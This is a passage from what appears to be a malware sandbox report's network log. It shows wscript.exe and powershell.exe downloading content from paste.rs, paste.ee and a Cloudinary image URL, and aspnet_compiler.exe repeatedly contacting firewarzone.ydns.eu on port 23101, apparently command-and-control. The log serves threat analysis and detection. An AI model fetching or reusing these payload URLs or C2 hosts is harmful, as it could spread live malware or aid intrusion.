          8.8.8.8:53
          Request
          41.132.26.184.in-addr.arpa
          IN PTR
          Response
          41.132.26.184.in-addr.arpa
          IN PTR
          a184-26-132-41deploystaticakamaitechnologiescom
        • flag-us
          DNS
          133.211.185.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.211.185.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          paste.ee
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          paste.ee
          IN A
          Response
          paste.ee
          IN A
          172.67.187.200
          paste.ee
          IN A
          104.21.84.67
        • flag-us
          GET
          https://paste.ee/r/IUrXP/0
          powershell.exe
          Remote address:
          172.67.187.200:443
          Request
          GET /r/IUrXP/0 HTTP/1.1
          Host: paste.ee
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Tue, 17 Dec 2024 13:33:12 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=2592000
          strict-transport-security: max-age=63072000
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block
          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
          CF-Cache-Status: HIT
          Age: 19119
          Last-Modified: Tue, 17 Dec 2024 08:14:33 GMT
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvll4DwjNMUHFfiDQgF%2BTovgE0Yi3yNQ7epHu%2F86vhDirSpUDFNtiOwg4jjx9D1vj50YkEu8I4tHZtv79QosoF7%2Fo7ADZHoZFpPgLHtHzCTDwEX1H%2BynK7uCMA%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8f3748987a71651f-LHR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=51905&min_rtt=47328&rtt_var=17107&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2977&recv_bytes=359&delivery_rate=57344&cwnd=249&unsent_bytes=0&cid=cdaadaef08715268&ts=166&x=0"
        • flag-us
          DNS
          200.187.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          200.187.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          rem.pushswroller.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          rem.pushswroller.eu
          IN A
          Response
          rem.pushswroller.eu
          IN A
          45.80.158.30
        • flag-us
          DNS
          firewarzone.ydns.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          firewarzone.ydns.eu
          IN A
          Response
          firewarzone.ydns.eu
          IN A
          45.80.158.30
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          30.158.80.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          30.158.80.45.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          50.23.12.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          50.23.12.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          241.42.69.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.42.69.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          GET
          https://paste.rs/LDDIb
          wscript.exe
          Remote address:
          45.63.94.214:443
          Request
          GET /LDDIb HTTP/1.1
          Accept: */*
          Accept-Language: en-us
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: paste.rs
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Tue, 17 Dec 2024 13:34:13 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          x-content-type-options: nosniff
          permissions-policy: interest-cohort=()
          x-frame-options: SAMEORIGIN
          Strict-Transport-Security: max-age=31536000; includeSubdomains;
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Encoding: gzip
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          res.cloudinary.com
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          res.cloudinary.com
          IN A
          Response
          res.cloudinary.com
          IN CNAME
          resc.cloudinary.com.cdn.cloudflare.net
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.201.1
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.202.1
        • flag-us
          GET
          https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
          powershell.exe
          Remote address:
          104.17.201.1:443
          Request
          GET /dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg HTTP/1.1
          Host: res.cloudinary.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Tue, 17 Dec 2024 13:34:14 GMT
          Content-Type: image/jpeg
          Content-Length: 2676697
          Connection: keep-alive
          CF-Ray: 8f374a1f09e0891e-LHR
          Accept-Ranges: bytes
          Access-Control-Allow-Origin: *
          Cache-Control: public, no-transform, immutable, max-age=2592000
          ETag: "e5745d252aadd8dc5931363c7261f0a8"
          Last-Modified: Mon, 16 Dec 2024 02:14:05 GMT
          Strict-Transport-Security: max-age=604800
          Vary: Accept-Encoding
          access-control-expose-headers: Content-Length,ETag,Server-Timing,Vary,x-content-type-options
          server-timing: cld-cloudflare;dur=43;start=2024-12-17T13:34:14.903Z;desc=hit,rtt;dur=50,content-info;desc="width=1920,height=1080,bytes=2676697,format="jpg",o=1,crt=1734315244,ef=(17);"
          timing-allow-origin: *
          x-content-type-options: nosniff
          x-request-id: 70d4331ee42414ff46f04161fd976324
          Server: cloudflare
        • flag-us
          DNS
          1.201.17.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          1.201.17.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          paste.ee
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          paste.ee
          IN A
          Response
          paste.ee
          IN A
          104.21.84.67
          paste.ee
          IN A
          172.67.187.200
        • flag-us
          GET
          https://paste.ee/r/IUrXP/0
          powershell.exe
          Remote address:
          104.21.84.67:443
          Request
          GET /r/IUrXP/0 HTTP/1.1
          Host: paste.ee
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Tue, 17 Dec 2024 13:34:24 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Cache-Control: max-age=2592000
          strict-transport-security: max-age=63072000
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1; mode=block
          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
          CF-Cache-Status: HIT
          Age: 19191
          Last-Modified: Tue, 17 Dec 2024 08:14:33 GMT
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulIDzSHMa0I%2BBSo53mvzq9Xu8RcTHsklkZVkZDl4YJSAfxwujt95dPhXSDBc4PVv%2BS%2Bh%2FNI6V6TmtXlPs62UANnqF3ysxwcJrIMqakyfXO48gToPwfYAGGU%2Fgg%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8f374a5c8c92d17c-LHR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=49027&min_rtt=47355&rtt_var=12828&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2977&recv_bytes=359&delivery_rate=78530&cwnd=253&unsent_bytes=0&cid=2d4949e44440136a&ts=138&x=0"
        • flag-us
          DNS
          67.84.21.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          67.84.21.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          43.229.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          43.229.111.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          DNS
          sun.drillmmcsnk.eu
          aspnet_compiler.exe
          Remote address:
          8.8.8.8:53
          Request
          sun.drillmmcsnk.eu
          IN A
          Response
        • flag-us
          GET
          https://paste.rs/LDDIb
          wscript.exe
          Remote address:
          45.63.94.214:443
          Request
          GET /LDDIb HTTP/1.1
          Accept: */*
          Accept-Language: en-us
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: paste.rs
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Tue, 17 Dec 2024 13:35:26 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          x-content-type-options: nosniff
          permissions-policy: interest-cohort=()
          x-frame-options: SAMEORIGIN
          Strict-Transport-Security: max-age=31536000; includeSubdomains;
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Encoding: gzip
        • flag-us
          DNS
          res.cloudinary.com
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          res.cloudinary.com
          IN A
          Response
          res.cloudinary.com
          IN CNAME
          resc.cloudinary.com.cdn.cloudflare.net
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.201.1
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.202.1
        • flag-us
          DNS
          res.cloudinary.com
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          res.cloudinary.com
          IN A
          Response
          res.cloudinary.com
          IN CNAME
          resc.cloudinary.com.cdn.cloudflare.net
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.202.1
          resc.cloudinary.com.cdn.cloudflare.net
          IN A
          104.17.201.1
        • 45.63.94.214:443
          paste.rs
          tls
          WScript.exe
          1.8kB
          26.0kB
          26
          23
        • 184.26.132.41:443
          res.cloudinary.com
          tls
          powershell.exe
          46.5kB
          2.8MB
          1002
          1994
        • 172.67.187.200:443
          https://paste.ee/r/IUrXP/0
          tls, http
          powershell.exe
          17.7kB
          685.5kB
          352
          505

          HTTP Request

          GET https://paste.ee/r/IUrXP/0

          HTTP Response

          200
        • 45.80.158.30:23101
          rem.pushswroller.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          500 B
          212 B
          7
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          510 B
          92 B
          4
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          132 B
          5
          3
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          716 B
          92 B
          5
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          356 B
          92 B
          4
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.63.94.214:443
          https://paste.rs/LDDIb
          tls, http
          wscript.exe
          1.8kB
          26.0kB
          26
          23

          HTTP Request

          GET https://paste.rs/LDDIb

          HTTP Response

          200
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 104.17.201.1:443
          https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
          tls, http
          powershell.exe
          60.4kB
          2.8MB
          1209
          2006

          HTTP Request

          GET https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

          HTTP Response

          200
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          350 B
          172 B
          4
          4
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          448 B
          212 B
          6
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          350 B
          172 B
          4
          4
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 104.21.84.67:443
          https://paste.ee/r/IUrXP/0
          tls, http
          powershell.exe
          17.8kB
          685.7kB
          355
          509

          HTTP Request

          GET https://paste.ee/r/IUrXP/0

          HTTP Response

          200
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          304 B
          92 B
          3
          2
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
          5
        • 45.80.158.30:23101
          firewarzone.ydns.eu
          tls
          aspnet_compiler.exe
          396 B
          212 B
          5
